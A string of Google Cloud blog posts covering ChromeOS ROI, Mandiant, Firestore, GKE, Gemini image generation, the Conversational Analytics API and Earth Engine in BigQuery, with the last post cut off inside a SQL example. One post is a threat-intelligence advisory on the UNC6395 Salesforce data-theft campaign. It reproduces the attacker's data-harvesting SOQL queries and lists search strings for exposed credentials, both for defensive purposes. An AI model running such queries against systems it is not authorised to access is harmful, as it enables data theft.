Forrester’s analysis, based on interviews with six decision-makers experienced with ChromeOS, aggregated their experiences into a composite organization. This composite organization, a multinational corporation with $5 billion in annual revenue and 40,000 employees, realized a 208% return on investment (ROI) over three years, a payback period of less than 6 months, and a Net Present Value (NPV) of $6.8 million in savings. The study highlighted four key areas where the composite organizations achieved significant benefits:
Increased End-User Productivity
Forrester Consulting found that the composite organization saved 90,000 hours per year in productivity time by leveraging ChromeOS, a $6.5 million in total savings over a three year period. Additionally, Interviewees reported a 6-minute drop in login time per employee, with one noting that users experienced over 12 hours less downtime per year with ChromeOS
These gains can be attributed to ChromeOS’s fast bootup times, seamless cloud integration and reduced upfront onboarding times, and AI-integration that helps workers focus on the work they value most.
The users love it. They don’t have to wait for IT to fix things. They don’t have to worry about updates or antivirus. It just works.
CTO
Healthcare
Lowered Device and Licensing Costs
The study also found that ChromeOS led to $1.3 million in savings over three years for the composite organization due to reduced device and license costs. Organizations saved approximately $500 per device, including $300 in hardware costs and $200 in avoided software licenses for security and endpoint management.
With the Google Admin console, ChromeOS devices can be centrally managed and secured so IT admins can reduce additional security agents and management solutions if they choose. Additionally, with 10 years of OS updates, Chromebooks are built to last a long time. What’s more, organizations can install ChromeOS Flex at no cost to extend the life of existing Windows devices, further contributing to savings.
We don’t need to pay for software-licenses. We don’t need to pay for antivirus. We don’t need to pay for a lot of things that we used to pay for.
Enterprise Director
Manufacturing
Strengthened Security Posture
The composite organization achieved a $1.2 million financial benefit from strengthened security. This was driven by a 90% incremental security risk reduction with ChromeOS. One interviewee observed that the number of vulnerabilities per end-user device decreased by 90% after deploying ChromeOS.
ChromeOS offers multi-layered security, automatic updates that happen in the background, and encryption, all contributing to a “secure by default” environment that eliminates the need for extra antivirus software.
Our number of vulnerabilities per end-user device decreased 90% as we continued the ChromeOS rollout. It’s still the only operating system, I believe, that has never had a ransomware attack.
CTO
Healthcare
Reduced IT Support Needs
According to the study, ChromeOS reduced IT support needs, delivering at least $1.1 million in savings over three years. Organizations experienced a 63% reduction in help desk tickets with ChromeOS. Interviewees reported that tickets that did arise were resolved quickly. One interviewee reported that ChromeOS-related tickets take approximately 15 minutes on average to resolve, compared to 2 hours for other operating systems.
We have just one FTE to manage a fleet of 11,000 devices. We barely have to think about it.
Head of IT Security
Financial Services
Discover More: Join Our Webinar!
Interested in learning how these benefits can apply to your organization? Join us for an upcoming webinar: The Total Economic Impact of ChromeOS.
During this session, we will:
Discuss how ChromeOS helps businesses reduce costs related to security, IT, and licensing, while also improving productivity.
Walk through the key findings from Forrester Consulting’s “The Total Economic Impact of ChromeOS” study.
Help you identify users at your organization who are ready to move to ChromeOS by leveraging the ChromeOS Readiness assessment
Today’s cybersecurity landscape requires partners with expertise and resources to handle any incident. Mandiant, a core part of Google Cloud Security, can empower organizations to navigate critical moments, prepare for future threats, build confidence, and advance their cyber defense programs.
We’re excited to announce that Google has been named a Leader in the IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment (doc #US52036825, August 2025). According to the report, “Mandiant, now a core part of Google Cloud Security, continues to be one of the most recognized and respected names in incident response. With over two decades of experience, Mandiant has built a reputation for responding to some of the world’s most complex and high-impact cyberincidents.” We believe this recognition reflects Mandiant’s extensive experience in some of the world’s most complex and high-impact cyber incidents.
We employ a tightly coordinated “team of teams” model, integrating specialized groups for forensics, threat intelligence, malware analysis, remediation, and crisis communications to assist our customers quickly and effectively.
Our expertise spans technologies and environments, from multicloud and on-premise systems to critical infrastructure. We help secure both emerging and mainstream technologies including AI, Web3, cloud platforms, web applications, and identity systems.
“This structure allows Mandiant to deliver rapid, scalable, and highly tailored responses to incidents ranging from ransomware and nation-state attacks to supply chain compromises and destructive malware,” said the IDC MarketScape report.
SOURCE: “IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment” by Craig Robinson & Scott Tiazkun, August 2025, IDC # US52036825.
IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology and suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each supplier’s position within a given market. The Capabilities score measures supplier product, go-to-market and business execution in the short-term. The Strategy score measures alignment of supplier strategies with customer requirements in a 3-5-year timeframe. Supplier market share is represented by the size of the icons.
Differentiated, rapid, and holistic incident response
Speed is crucial in cyber-incident response, and cyber events can quickly become a reputational crisis. Helping customers address those concerns drives our Incident Response Services.
A key part of that is Mandiant’s Cyber Crisis Communication Planning and Response Services, launched in 2022. The IDC MarketScape noted, “The firm’s crisis communications practice, launched in 2022, is a unique offering in the IR space. Recognizing that cyberincidents are as much about trust and perception as they are about technology, Mandiant provides strategic communications support to help clients manage media inquiries, stakeholder messaging, and align with regulatory frameworks.”
Our approach combines robust remediation, recovery, and resilience solutions, including repeatable and cost-effective minimal viable business recovery environments. Designed to restore critical operations after ransomware attacks, our offerings can help reduce recovery timelines from weeks to days — or even hours.
The report notes, “A key differentiator is Mandiant’s integration with Google’s SecOps platform, which enables rapid deployment of investigative capabilities without the need for lengthy software installations. This allows Mandiant to begin triage and scoping within hours, leveraging existing client telemetry and augmenting it with proprietary forensic tools like FACT and Monocle. These tools allow for deep forensic interrogation of endpoints and orchestration of data collection at enterprise scale — capabilities that go beyond what traditional EDR platforms offer.”
Unparalleled access to threat intelligence
Google Threat Intelligence fuses Mandiant’s frontline expertise, the global reach of the VirusTotal community, and the visibility from Google’s services and devices — enhanced by AI. “As part of Google, Mandiant now benefits from unparalleled access to global infrastructure, engineering resources, and threat intelligence,” said the IDC MarketScape report.
By ensuring that this access is deeply embedded in Mandiant Incident Response and Consulting services, we can quickly identify threat actors, tactics, and indicators of compromise (IOCs). A dedicated threat intelligence analyst supports each incident response case, ensuring findings are contextualized and actionable.
Advancing cyber defenses with a strategic, global leader
For more than two decades, Mandiant experts have helped global enterprises respond to and recover from their worst days. We enable organizations to go beyond technology solutions, evaluate specific business threats, and strengthen their cyber defenses.
“Organizations that seek to work with a globally capable IR firm with strong threat intelligence capabilities and that utilizes a holistic approach to incident response that goes beyond the technical portions should consider Google,” said the report.
At Cloud Next ’25, we announced the preview of Firestore with MongoDB compatibility, empowering developers to build cost-effective, scalable, and highly reliable apps on Firestore’s serverless database using a familiar MongoDB-compatible API. Today, we’re announcing that Firestore with MongoDB compatibility is now generally available.
With this launch, the 600,000 active developers within the Firestore community can now use existing MongoDB application code, drivers, and tools, as well as the open-source ecosystem of MongoDB integrations with Firestore’s distinguished serverless service. Firestore provides benefits such as multi-region replication with strong consistency, virtually unlimited scalability, industry-leading high availability with an up to 99.999% SLA, single-digit milliseconds read performance, integrated Google Cloud governance, and a cost-effective pay-as-you-go pricing model.
Firestore with MongoDB compatibility is attracting significant customer interest from diverse industries, including financial services, healthcare, retail, and manufacturing. We’re grateful for the engagement and opportunity this afforded to prioritize features that enable key customer use cases. For instance, a prominent online retail company sought to migrate their product catalog from another document database to Firestore with MongoDB compatibility to maximize scalability and availability. To support this migration, the customer maximized new capabilities like unique indexes to guarantee distinct universal product identifiers. The customer is excited to migrate their production traffic to Firestore with MongoDB compatibility now that it’s generally available.
What’s new in Firestore with MongoDB compatibility
Based on direct customer feedback during the preview, we introduced new capabilities to Firestore with MongoDB compatibility, including expanded support for the Firestore with MongoDB compatibility API, enhanced enterprise readiness, and access from both Firebase and Google Cloud. Let’s take a closer look.
1. Expanded support for Firestore with MongoDB compatibility API and query language
Firestore with MongoDB compatibility API and query language now supports over 200 capabilities. Developers can now create richer applications by leveraging new stages and operators that enable joining data across collections, data analysis within buckets, and advanced querying capabilities including arrays, sets, arithmetic, type conversion, and bitwise operations. We also added support for creating indexes directly from the Firestore with MongoDB compatibility API, including the ability to create unique indexes that ensure distinct field values across documents within a collection. Furthermore, the Firestore Studio console editor now features a new JSON viewer and a data export tool. You can find a comprehensive list of Firestore with MongoDB compatibility capabilities in thedocumentation.
Utilize the MongoDB Query Language (MQL) to run queries like pinpointing optimal wishlist purchase conversions, using new operators and stages such as $setIntersection and $lookup.
2. Built for the enterprise
We have built Firestore with MongoDB compatibility to meet the needs of the enterprise, including new disaster recovery, change data capture, security, and observability features.
For disaster recovery, we’ve integrated Point-in-Time Recovery (PITR) to complement existing scheduled backups. This helps you recover from human errors, such as accidental data deletion, by enabling version control to rollback back at any point in time from the past seven days. We’ve also introduced database clones, allowing you to create an isolated copy of your database for staging, development, or analytics from any point-in-time recovery snapshot. Furthermore, we’ve incorporated managed export and import, enabling you to create a portable copy of your Firestore data in Cloud Storage for archival and other regulatory purposes.
Firestore offers multiple, easy-to-use, disaster recovery options including point-in-time recovery and scheduled backups.
For change data capture, trigger support has been added, enabling the configuration of server-side code to respond to document creation, updates, or deletions within your collections. This facilitates the replication of Firestore data changes to other services, such as BigQuery.
Regarding security, Private Google Access has been implemented, providing secure access from in-perimeter Google Cloud services with a private IP address, to a Firestore with MongoDB compatibility database. This connection option is available with no additional cost.
In terms of observability, Firestore with MongoDB compatibility now supports new metrics within a Firestore usage page. This simplifies the identification of MongoDB compatibility API calls that contribute to cost and traffic. This observability feature augments existing capabilities like query explain and query insights to help optimize usage.
3. Broader accessibility through Firebase in addition to Google Cloud
Finally, you can now access Firestore with MongoDB compatibility alongside all of your favorite developer services in Firebase, as well as in Google Cloud. This means you can manage Firestore with MongoDB compatibility from both the Firebase and Google Cloud consoles, and their respective command-line interfaces (CLI).
Create, manage and query your Firestore with MongoDB compatibility database using the Firebase Console.
“While containers make packaging apps easier, a powerful cluster manager and orchestration system is necessary to bring your workloads to production.”
Ten years ago, these words opened the blog post announcing Google Kubernetes Engine (GKE). The need for a managed Kubernetes platform is as important today as it was then, especially as workloads have evolved to meet increasingly complex demands.
One year before GKE’s arrival, we open-sourced large parts of our internal container management system, Borg, as Kubernetes. This marked the beginning of offering our own platforms to customers, and as we continue to use Kubernetes and GKE to power leading services like Vertex AI, we distill our learnings and best practices into GKE. Innovating and evolving GKE to meet the demands of our global platforms and services means that we deliver a best-in-class platform for our customers.
Enhanced flexibility with updated pricing
After ten years of evolution comes another shift: we are updating GKE to make sure every customer can balance efficiency, performance, and cost as effectively as possible. In September 2025, we’re moving to a single paid tier of GKE that comes with more features, and that lets you add features as needed. Now, every customer can take advantage of multi-cluster management features like Fleets, Teams, Config Management, and Policy Controller — all available with GKE Standard at no additional cost.
Flexibility and versatility are always in demand. The new GKE pricing structure provides à la carte access to additional features to meet the specific needs of all of your clusters. We want you to direct your resources toward the most impactful work at all times, and are confident that a single GKE pricing tier will help you manage your workloads — and your budgets — more effectively.
Optimized compute with Autopilot for every cluster
When we launched GKE Autopilot four years ago, we made Kubernetes accessible to every organization — no Kubernetes expertise required. More recently, we rolled out a new container-optimized compute platform, which delivers unique efficiency and performance benefits, ensuring you get the most out of your workload’s allocated resources, so you can serve more traffic with the same capacity, or existing traffic with fewer resources.
Now, we’re making Autopilot available for every cluster, including existing GKE Standard clusters, on an ad hoc, and per-workload basis. Soon, you’ll be able to turn on Autopilot (and off) in any existing Standard cluster to take advantage of fully managed Kubernetes with better performance, at the best price.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e781f525f40>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Innovations for customer success
The technological landscape shifts quickly. A few years ago, organizations were thinking about stateless microservices; today, the focus is on running complex AI workloads. Throughout, we’re always adapting GKE to meet the needs of innovative companies for new scenarios.
We’re proud of the many incredible products and services built on GKE by customers ranging from startups, to enterprises, to AI companies. AI-powered advertising provider Moloco trains and runs its models with TPUs running on GKE. For nearly a decade, Signify has leveraged GKE as the foundation for its Philips Hue smart lighting platform worldwide. And AI unicorn Anthropic depends on GKE to deliver the scale they need to train and serve their models.
“GKE’s new support for larger clusters provides the scale we need to accelerate our pace of AI innovation.” – James Bradbury, Head of Compute, Anthropic
Foundations for consistent evolution
The AI era has just begun, and we’ve been pushing GKE to meet tomorrow’s workload demands today. With customer insights and Google’s best practices baked in, GKE is the ideal platform for developing and deploying AI at scale.
Thank you to our community, customers, and partners who have been on the GKE journey with us. Celebrate a decade of GKE with us by joining the GKE Turns 10 Hackathon and reading the 10 years of GKE ebook. The future is revealing itself every day, and GKE is ready for wherever AI takes us next.
Today, we announced native image generation and editing in Gemini 2.5 Flash to deliver higher-quality images and more powerful creative control. Gemini 2.5 Flash Image is State of the Art (SOTA) for both generation and image editing. For creative use cases, this means you can create richer, more dynamic visuals and edit images until they’re just right. Here are some ways you can use our state of the art native image generation in Gemini 2.5 Flash.
Multi-image fusion: Combine different images into one seamless new visual. You can use multiple reference images to create a single, unified image for use cases such as marketing, training, or advertising.
Character & style consistency: Maintain the same subject or visual style across multiple generations. Easily place the same character or product in different scenes without losing their identity, saving you from time-consuming fine-tuning.
Conversational editing: Edit images with simple, natural language instructions. From removing a person from a group photo to fixing a small detail like a stain, you can make changes through a simple conversation.
Developers and enterprises can access Gemini 2.5 Flash Image in preview today on Vertex AI.
Here’s how customers are leveraging Vertex AI to build next-gen visuals with Gemini 2.5 Flash Image
“With today’s addition of Google’s Gemini 2.5 Flash Image in Adobe Firefly and Adobe Express, people have even greater flexibility to explore their ideas with industry-leading generative AI models and create stunning content with ease. And with seamless integration across Creative Cloud apps, only Adobe delivers a complete creative workflow that takes ideas from inspiration to impact – empowering everyone with the freedom to experiment, the confidence to perfect every detail, and the control to make their work stand out.” – Hannah Elsakr, Vice President, New GenAI Business Ventures, Adobe
“In our evaluation, Gemini 2.5 Flash Image showed notable strengths in maintaining cross‑edit coherence — preserving both fine‑grained visual details and higher‑level scene semantics across multiple revision cycles. Combined with its low response times, this enables more natural, conversational editing loops and supports deployment in real‑time image‑based applications on Poe and through our API.” – Nick Huber, AI Ecosystem Lead, Poe (by Quora)
“Gemini 2.5 Flash Image an incredible addition to Google’s gen media suite of models. We have tested it across multiple WPP clients and products and have been impressed with the quality of output. We see powerful use cases across multiple sectors, particularly retail, with its ability to combine multiple products into single frames, and CPG, where it maintains a high level of object consistency across frames. We are looking forward to integrating Gemini 2.5 Flash Image into WPP Open, our AI-enabled marketing services platform and developing new production workflows.” – Daniel Barak, Global Creative and Innovation Lead, WPP
“For anyone working with visual content, Gemini 2.5 Flash Image is a serious upgrade. Placing products, keeping styles aligned, and ensuring character consistency can all be done in a single step. The model handles complex edits easily, producing results that look polished and professional instantly. Freepik has integrated it into the powerful AI suite powering image generation and editing to help creatives express the power of their ideas.” – Joaquin Cuenca, CEO, Freepik
“Editing requires the highest level of control in any creative process. Gemini 2.5 Flash Image meets that need head-on, delivering precise, iterative changes. It also exhibits extreme flexibility – allowing for significant adjustments to images while retaining character and object consistency. From our early testing at Leonardo.Ai, this model will enable entirely new workflows and creative possibilities, representing a true step-change in capability for the creative industry.” – JJ Fiasson, CEO, Leonardo.ai
Figma‘s AI image tools now include Google’s Gemini 2.5 models, enabling designers to generate and refine images using text prompts—creating realistic content that helps communicate design vision.
Written by: Austin Larsen, Matt Lin, Tyler McLellan, Omar ElAhdan
Introduction
Google Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395. Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application.
The actor systematically exported large volumes of data from numerous corporate Salesforce instances. GTIG assesses the primary intent of the threat actor is to harvest credentials. After the data was exfiltrated, the actor searched through the data to look for secrets that could be potentially used to compromise victim environments. GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. UNC6395 demonstrated operational security awareness by deleting query jobs, however logs were not impacted and organizations should still review relevant logs for evidence of data exposure.
Salesloft indicated that customers that do not integrate with Salesforce are not impacted by this campaign. There is no evidence indicating direct impact to Google Cloud customers, however any customers that use Salesloft Drift should also review their Salesforce objects for any Google Cloud Platform service account keys.
On Aug. 20, 2025 Salesloft, in collaboration with Salesforce, revoked all active access and refresh tokens with the Drift application. In addition, Salesforce removed the Drift application from the Salesforce AppExchange until further notice and pending further investigation. This issue does not stem from a vulnerability within the core Salesforce platform.
GTIG, Salesforce, and Salesloft have notified impacted organizations.
Threat Detail
The threat actor executed queries to retrieve information associated with Salesforce objects such as Cases, Accounts, Users, and Opportunities. For example, the threat actor ran the following sequence of queries to get a unique count from each of the associated Salesforce objects.
SELECT COUNT() FROM Account;
SELECT COUNT() FROM Opportunity;
SELECT COUNT() FROM User;
SELECT COUNT() FROM Case;
Query to Retrieve User Data
SELECT Id, Username, Email, FirstName, LastName, Name, Title, CompanyName,
Department, Division, Phone, MobilePhone, IsActive, LastLoginDate,
CreatedDate, LastModifiedDate, TimeZoneSidKey, LocaleSidKey,
LanguageLocaleKey, EmailEncodingKey
FROM User
WHERE IsActive = true
ORDER BY LastLoginDate DESC NULLS LAST
LIMIT 20
Query to Retrieve Case Data
SELECT Id, IsDeleted, MasterRecordId, CaseNumber <snip>
FROM Case
LIMIT 10000
Recommendations
Given GTIG’s observations of data exfiltration associated with the campaign, organizations using Drift integrated with Salesforce should consider their Salesforce data compromised and are urged to take immediate remediation steps.
Impacted organizations should search for sensitive information and secrets contained within Salesforce objects and take appropriate action, such as revoking API keys, rotating credentials, and performing further investigation to determine if the secrets were abused by the threat actor.
Investigate for Compromise and Scan for Exposed Secrets
Search for the IP addresses and User-Agent strings provided in the IOCs section below. While this list includes IPs from the Tor network that have been observed to date, Mandiant recommends a broader search for any activity originating from Tor exit nodes.
Review Salesforce Event Monitoring logs for unusual activity associated with the Drift connection user.
Review authentication activity from the Drift Connected App.
Review UniqueQuery events that log executed SOQL queries.
Open a Salesforce support case to obtain specific queries used by the threat actor.
Search Salesforce objects for potential secrets, such as:
AKIA for long-term AWS access key identifiers
Snowflake or snowflakecomputing.com for Snowflake credentials
password, secret,key to find potential references to credential material
Strings related to organization-specific login URLs, such as VPN or SSO login pages
Run tools like Trufflehog to find secrets and hardcoded credentials.
Rotate Credentials
Immediately revoke and rotate any discovered keys or secrets.
Reset passwords for associated user accounts.
Configure session timeout values in Session Settings to limit the lifespan of a compromised session.
Decision-makers, employees, and customers all need answers where they work: in the applications they use every day. In recent years, the rise of AI-powered BI has transformed our relationship with data, enabling us to ask questions in natural language and get answers fast. But even with support for natural language, the insights you receive are often confined to the data in your BI tool. At Google Cloud, our goal is to change this.
At Google Cloud Next 25, we introduced the Conversational Analytics API, which lets developers embed natural-language query functionality in custom applications, internal tools, or workflows, all backed by trusted data access and scalable, reliable data modeling. The API is already powering first-party Google Cloud conversational experiences including Looker and BigQuery data canvas, and is available for Google Cloud developers of all stripes to implement wherever their imagination takes them. Today we release the Conversational Analytics API in public preview.Start building with our documentation.
The Conversational Analytics API lets you build custom data experiences that provide data, chart, and text answers while leveraging Looker’s trusted semantic model for accuracy or providing critical business and data context to agents in BigQuery. You can embed this functionality to create intuitive data experiences, enable complex analysis via natural language, and even orchestrate conversational analytics agents as ‘tools’ for an orchestrator agent using Agent Development Kit.
The Google Health Population app is being developed with the Conversational Analytics API
Getting to know the Conversational Analytics API
The Conversational Analytics API allows you to interact with your BigQuery or Looker data through chat, from anywhere. Embed side-panel chat next to your Looker dashboards, invoke agents in chat applications like Slack, customize your company’s web applications, or build multi-agent systems.
This API empowers your team to obtain answers precisely when and where they are needed, directly within their daily workflows. It achieves this by merging Google’s advanced AI models and agentic capabilities with Looker’s semantic layer and BigQuery’s context engineering services. The result is natural language experiences that can be shared across your organization, making data-to-insight interaction seamless in your company’s most frequently used applications.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebcfb3c6280>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Building with Google’s Analytics and AI stack comes with significant benefits in accurate question answering:
Best-in-class AI for data analytics
An agentic architecture that enables the system to perceive its environment and take actions
Access to Looker’s powerful semantic layer for trustworthy answers
High-performance agent tools, including software functions, charts and APIs, supported by dedicated engineering teams
Trust your data is secure with data with row and column level access controls by default
Guard against expensive queries with built-in query limitations
When pairing Conversational Analytics API with Looker, Looker’s semantic layer reduces data errors in gen AI natural language queries by as much as two thirds, so that queries are sourced in truth.
Looker’s semantic layer ensures your conversational analytics are grounded in data truth.
An agentic architecture powered by Google AI
The Conversational Analytics API uses purpose-built models for querying and analyzing data to provide accurate answers, while its flexible agentic architecture lets you configure which capabilities the agent leverages to best provide users with answers to their questions.
Conversational Analytics leverages an agentic architecture to empower agent creators with the right tools.
As a developer, you can compose AI-powered agents with the following tools:
Text-to-SQL, trusted by customers using Gemini in BigQuery
Context retrieval, informed by personalized and organization usage
Looker’s NL-to-Looker Query Engine, to leverage the analyst-curated semantic layer
Code Interpreter, for advanced analytics like forecasting and root-cause analysis
Charting, to create stunning visualizations and bring data to life
Insights, to explain answers in plain language
These generative AI tools are built upon Google’s latest Gemini models and fine-tuned for specific data analysis tasks to deliver high levels of accuracy. There’s also the Code Interpreter for Conversational Analytics, which provides computations ranging from cohort analysis to period-over-period calculations. Currently in preview, Code Interpreter turns you into a data scientist without having to learn advanced coding or statistical methods. Sign up for early access here.
Context retrieval and generation
A good data analyst isn’t just smart, but also deeply knowledgeable about your business and your data. To provide the same kind of value, a “chat with your data” experience should be just as knowledgeable. That’s why the Conversational Analytics API prioritizes gathering context about your data and queries.
Thanks to retrieval augmented generation (RAG), our Conversational Analytics agents know you and your data well enough to know that when you’re asking for sales in “New York” or “NYC,” you mean “New York City.” The API understands your question’s meaning to match it to the most relevant fields to query, and learns from your organization, recognizing that, for example, “revenue_final_calc” may be queried more frequently than “revenue_intermediate” in your BigQuery project, and adjusts accordingly. Finally, the API learns from your past interactions; it will remember that you queried about “customer lifetime value” in BigQuery Studio on Tuesday when you ask about it again on Friday.
Not all datasets have the context an agent needs to do its work. Column descriptions, business glossaries, and question-query pairs can all improve an agent’s accuracy, but they can be hard to create manually— especially if you have 1,000 tables in your business, each with 500 fields. To speed up the process of teaching your agent, we are including AI-assisted context, using Gemini to suggest metadata that might be useful for your agent to know, while letting you approve or reject changes.
Low maintenance burden
The Conversational Analytics API gives you access to the latest data agent tools from Google Cloud, so you can focus on building your business, not building more agents. You benefit from Google’s continued advancements in generative AI for coding and data analysis.
When you create an agent, we protect your data with Google’s security, best practices, and role-based access controls. Once you share your Looker or BigQuery agent, it can be used across Google Cloud products, such as Agent Development Kit, and in your own applications.
The Conversational Analytics API lets you interact with your data anywhere.
API powered chats from anywhere
With agents consumable via API, you can surface insights anywhere decision makers need them—whether it’s when speaking with a customer over a support ticket, via a tablet when you’re in the field, or in your messaging apps.
The Conversational Analytics API is designed to bring benefits to all users, whether they be business users, data analysts building agents, or software developers. With Conversational Agents, when a user asks a question, answers are delivered rapidly alongside the agent’s thinking process, to ensure the right approach to gaining insights is used. Individual updates allow your developers to control what a user sees — like answers and charts — and what you want to log for later auditing by analysts — like SQL and Python code.
Geospatial analytics can transform rich data into actionable insights that drive sustainable business strategy and decision making. At Google Cloud Next ‘25, we announced the preview of Earth Engine in BigQuery, an extension of BigQuery’s current geospatial offering, focused on enabling data analysts to seamlessly join their existing structured data with geospatial datasets derived from satellite imagery. Today, we’re excited to announce the general availability of Earth Engine in BigQuery and the preview of a new geospatial visualization capability in BigQuery Studio. With this new set of tools, we’re making geospatial analysis more accessible to data professionals everywhere.
Bringing Earth Engine to data analysts
Earth Engine in BigQuery makes it easy for data analysts to leverage core Earth Engine capabilities from within BigQuery. Organizations using BigQuery for data analysis can now join raster (and other data created from satellite data) with vector data in their workflows, opening up new possibilities for use cases such as assessing natural disaster risk over time, supply chain optimization, or infrastructure planning based on weather and climate risk data.
This initial release introduced two features:
ST_RegionStats()geography function: A new BigQuery geography function enabling data analysts to derive critical statistics (such as wildfire risk, average elevation, or probability of deforestation) from raster (pixel-based) data within defined geographic boundaries.
Earth Engine datasets in BigQuery Sharing: A growing collection of 20 Earth Engine raster datasets available in BigQuery Sharing (formerly Analytics Hub), offering immediate utility for analyzing crucial information such as land cover, weather, and various climate risk indicators.
What’s new in Earth Engine in BigQuery
With the general availability of Earth Engine in BigQuery, users can now leverage an expanded set of features, from what was previously available in preview:
Enhanced metadata visibility: A new Image Details tab in BigQuery Studio provides expanded information on raster datasets, such as band and image properties. This makes geospatial dataset exploration within BigQuery easier than ever before.
Improved usage visibility:View slot-time used per job and set quotas for Earth Engine in BigQuery to control your consumption, allowing you to manage your costs and better align with your budgets.
We know visualization is crucial to understanding geospatial data and insights in operational workflows. That’s why we’ve been working on improving visualization for the expanded set of BigQuery geospatial capabilities. Today, we’re excited to introduce map visualizationin BigQuery Studio, now available in preview.
You might have noticed that the “Chart” tab in the query results pane of BigQuery Studio is now called “Visualization.” Previously, this tab provided a graphical exploration of your query results. With the new Visualization tab, you’ll have all the previous functionality and a new capability to seamlessly visualize geospatial queries (containing a GEOGRAPHY data type) directly on a Google Map, allowing for:
Instant map views: See your query results immediately displayed on a map, transforming raw data into intuitive visual insights.
Interactive exploration: Inspect results, debug your queries, and iterate quickly by interacting directly with the map, accelerating your analysis workflow.
Customized visualization: Visually explore your query results with easy-to-use, customizable styling options, allowing you to highlight key patterns and trends effectively.
Built directly into BigQuery Studio’s query results, map visualization simplifies query building and iteration, making geospatial analysis more intuitive and efficient for everyone.
Visualization tab displays a heat map of census tracts in Colorado with the highest wildfire risk using the Wildfire Risk to Community dataset
Example: Analyzing extreme precipitation events
The integration of Earth Engine in BigQuery with map visualization within a single platform creates a powerful and unified geospatial analytics platform. This allows analysts to move from data discovery to complex analysis and visualization within a single platform, significantly reducing the time to insight. For businesses, this offers powerful new capabilities for assessing climate risk directly within their existing data workflows.
Consider a scenario where an insurance provider needs to assess how hydroclimatic risk is changing across its portfolio in Germany. Using Earth Engine in BigQuery, the provider can analyze decades of climate data to identify trends and changes in extreme precipitation events.
The first step is to access the necessary climate data. Through BigQuery Sharing, you can subscribe to Earth Engine datasets directly. For this analysis, we’ll use the ERA5 Land Daily Aggregates dataset (daily grid or “image” weather maps) to track historical precipitation.
BigQuery Sharing listings for Earth Engine with the ERA5 Daily Land Aggregates highlighted (left) and the dataset description with the “Subscribe” button (right)
By subscribing to the dataset, we can now query it. We use the ST_RegionStats() function to calculate statistics (like the mean or sum) for an image band over a specified geographic area. In the query below, we calculate the mean daily precipitation for a subset of counties in Germany for each day in our time range and then find the maximum value for each year:
Next, we analyze the output from the first query to identify changes in extreme event frequency. To do this, we calculate return periods. A return period is a statistical estimate of how likely an event of a certain magnitude is to occur. For example, a “100-year event” is not one that happens precisely every 100 years, but rather an event so intense that it has a 1% (1/100) chance of happening in any given year. This query compares two 30-year periods (1980-2010 vs. 1994-2024) to see how the precipitation values for different return periods have changed:
Note: This query can only be run in US regions. The Overture dataset is US-only. In addition, Earth Engine datasets are rolling out to EU regions over the coming weeks.
code_block
<ListValue: [StructValue([(‘code’, “– This UDF implements the Gumbel distribution formula to estimate the event magnitudern– for a given return period based on the sample mean (xbar) and standard deviation (sigma).rnCREATE TEMP FUNCTIONrnCalculateReturnPeriod(period INT64, xbar FLOAT64, sigma FLOAT64)rn RETURNS FLOAT64 AS ( ROUND(-LOG(-LOG(1 – (1 / period))) * sigma * .7797 + xbar – (.45 * sigma), 4) );rnrnrnWITHrn– Step 1: Define the analysis areas.rn– This CTE selects a specific subset of 10 major German cities.rn– ST_SIMPLIFY is used to reduce polygon complexity, improving query performance.rnCounties AS (rnFROM bigquery-public-data.overture_maps.division_arearn|> WHERE country = ‘DE’ AND subtype = ‘county’rn AND names.primary IN (rn ‘München’,rn ‘Köln’,rn ‘Frankfurt am Main’,rn ‘Stuttgart’,rn ‘Düsseldorf’)rn|> SELECTrn id,rn names.primary AS county,rn ST_SIMPLIFY(geometry,500) AS geometryrn),rn– Step 2: Define the time periods for comparison.rn– These two 30-year, overlapping epochs will be used to assess recent changes.rnEpochs AS (rn FROM UNNEST([rn STRUCT(‘e1’ AS epoch, 1980 AS start_year, 2010 AS end_year),rn STRUCT(‘e2’ AS epoch, 1994 AS start_year, 2024 AS end_year)])rn),rn– Step 3: Define the return periods to calculate.rnReturnPeriods AS (rn FROM UNNEST([10,25,50,100,500]) AS years |> SELECT *rn),rn– Step 4: Select the relevant image data from the Earth Engine catalog.rn– Replace YOUR_CLOUD_PROJECT with your relevant Cloud Project ID.rnImages AS (rn FROM YOUR_CLOUD_PROJECT.era5_land_daily_aggregated.climatern |> WHERE year BETWEEN 1980 AND 2024rn |> SELECTrn id AS img_id,rn start_datetime AS img_datern)rn– Step 5: Begin the main data processing pipeline.rn– This creates a processing task for every combination of a day and a county.rnFROM Imagesrn|> CROSS JOIN Countiesrn– Step 6: Perform zonal statistics using Earth Engine.rn– ST_REGIONSTATS calculates the mean precipitation for each county for each day.rn|> SELECTrnimg_id,rnCounties.id AS county_id,rnEXTRACT(YEAR FROM img_date) AS year,rnST_REGIONSTATS(geometry, img_id, ‘total_precipitation_sum’) AS areal_precipitation_statsrn– Step 7: Find the annual maximum precipitation.rn– This aggregates the daily results to find the single wettest day for each county within each year.rn|> AGGREGATErnSUM(areal_precipitation_stats.count) AS pixels_examined,rnMAX(areal_precipitation_stats.mean) AS yearly_max_1day_precip,rnANY_VALUE(areal_precipitation_stats.area) AS pixel_arearnGROUP BY county_id, yearrn– Step 8: Calculate statistical parameters for each epoch.rn– Joins the annual maxima to the epoch definitions and then calculates thern– average and standard deviation required for the Gumbel distribution formula.rn|> JOIN Epochs ON year BETWEEN start_year AND end_yearrn|> AGGREGATErn AVG(yearly_max_1day_precip * 1e3) AS avg_yearly_max_1day_precip,rn STDDEV(yearly_max_1day_precip * 1e3) AS stddev_yearly_max_1day_precip,rn GROUP BY county_id, epochrn– Step 9: Calculate the return period 